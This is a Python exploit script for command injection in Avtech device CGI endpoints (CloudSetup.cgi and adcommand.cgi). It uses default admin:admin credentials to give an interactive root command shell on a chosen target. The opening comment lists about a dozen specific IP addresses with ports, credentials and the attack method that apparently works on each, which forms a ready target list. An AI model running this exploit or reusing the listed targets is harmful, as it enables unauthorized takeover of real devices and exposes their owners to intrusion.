#!/usr/bin/python # -*- coding: utf-8 -*- #http://91.185.152.64:8080 admin:admin | adcommand command injection & cloud command #injection #http://2.182.237.138 admin:1234 | Brute Force #http://93.197.42.48:88 admin:admin | cloud command injection #http://183.88.176.217:2375 admin:admin | Adcommand & cloud command injection #http://171.96.204.181:9002 admin:admin | Brute Force #http://183.89.46.157:8834 admin:admin | Brute Force #http://180.183.81.30:7657 admin:admin | Brute Force #http://119.76.8.203:81 admin:admin | adcommand command injection #http://183.89.46.157:8001 admin:admin | Brute Force #http://73.14.108.80:88 admin:admin | Brute Force #http://58.11.226.8:8800 admin:admin | adcommand command injection import os import requests as req import random import re def ban(): print "######################################################" print "--> Title : Avtech Devices Remote Command Execution(Python)" print "--> Credit : SajjadBnz" print "--> Vendor : http://www.avtech.com.tw/" print "--> My Email : blackwolf@post.com" print "--> Tested On : Ubuntu 18.04.1 LTS" print "--> Default User:Pass : admin:admin" print "--> References : https://www.exploit-db.com/exploits/40500\n\n" def clearing(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) cl = '' clw = 'color a' os.system([cl, clw][os.name == 'nt']) def main(): global ip,port,payload,head payload = ["/cgi-bin/supervisor/CloudSetup.cgi?exefile=","/cgi-bin/supervisor/adcommand.cgi"] head = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"} try: global flag,exp,exp1 flag = 0 exp = '' exp1 = '' ip = raw_input('[*] IP Address : ') port = raw_input('[*] Port : ') testCon = "http://"+ip+":"+port print "[!] Checking Connection ..." r = req.get(testCon,timeout=20) pr = req.codes.ok if pr == 200: print "[+]",pr,"ok" else: print "-",pr," GoodBye!" except req.exceptions.RequestException as e: print "[Network Error]\n\n",e raise SystemExit except KeyboardInterrupt: print "\n\n[+] Ctrl+c Detected ! ¯\_(ツ)_/¯\n[-] GoodBye!\n" raise SystemExit for x in payload: shell = "http://"+ip+":"+port+x if flag == 0: flag = 1 r = req.get(shell,headers=head,auth=('admin', 'admin'),timeout=20) content = r.text if (re.findall('-3',content) or re.findall('-35',content) or re.findall('401',content) or re.findall('-9',content) or re.findall('403',content) or re.findall('File not found',content)): print "\n[-] CloudSetup.cgi Not vulnerable !" else: print "\n[+] Vulnerable !" print "[+] Authenticated command injection in CloudSetup.cgi\n" exp = 0 else: pos = 'DoShellCmd "strCmd=&"' r1 = req.post(shell,headers=head,auth=('admin', 'admin'),data=pos,timeout=20) content = r1.text if (re.findall('-3',content) or re.findall('-35',content) or re.findall('401',content) or re.findall('-9',content) or re.findall('403',content) or re.findall('File not found',content)): print "[-] adcommand.cgi Not vulnerable !\n" else: print "\n[+] adcommand.cgi Vulnerable !" print "[+] Authenticated command injection in adcommand.cgi\n" exp1 = 1 if exp1 == 1 and exp == 0: print "\n[+] Vulnerabilites : " print "[+] Authenticated command injection in CloudSetup.cgi" print "[+] Authenticated command injection in adcommand.cgi\n" exp1 = 0 print "[+] Using CloudSetup.cgi\n" exploit() elif exp == 0: print "[+] Using CloudSetup.cgi\n" exploit() elif exp1 == 1: print "[+] Using Adcommand.cgi\n" exploit() else: raise SystemExit def exploit(): print "[+] got root? :) - use 'exit' to exit" print "-------------------------------------" try: while True: c1 = raw_input('root@AvTech: ') if c1 == "exit" or c1 == "Exit": print "\n[+] ¯\_(ツ)_/¯ Have a nice day !\n" raise SystemExit if exp1 == 1: pos = 'DoShellCmd "strCmd=%s&"' % c1 shell = "http://"+ip+":"+port+payload[exp1] r = req.post(shell,headers=head,auth=('admin', 'admin'),data=pos,timeout=20) print r.text else: shell = "http://"+ip+":"+port+payload[exp]+c1 r = req.get(shell,headers=head,auth=('admin', 'admin'),timeout=20) print r.text except KeyboardInterrupt: print "\n\n[+] Ctrl+c Detected ! ¯\_(ツ)_/¯\n[-] Good Bye!\n" raise SystemExit if __name__ == '__main__': clearing() ban() main()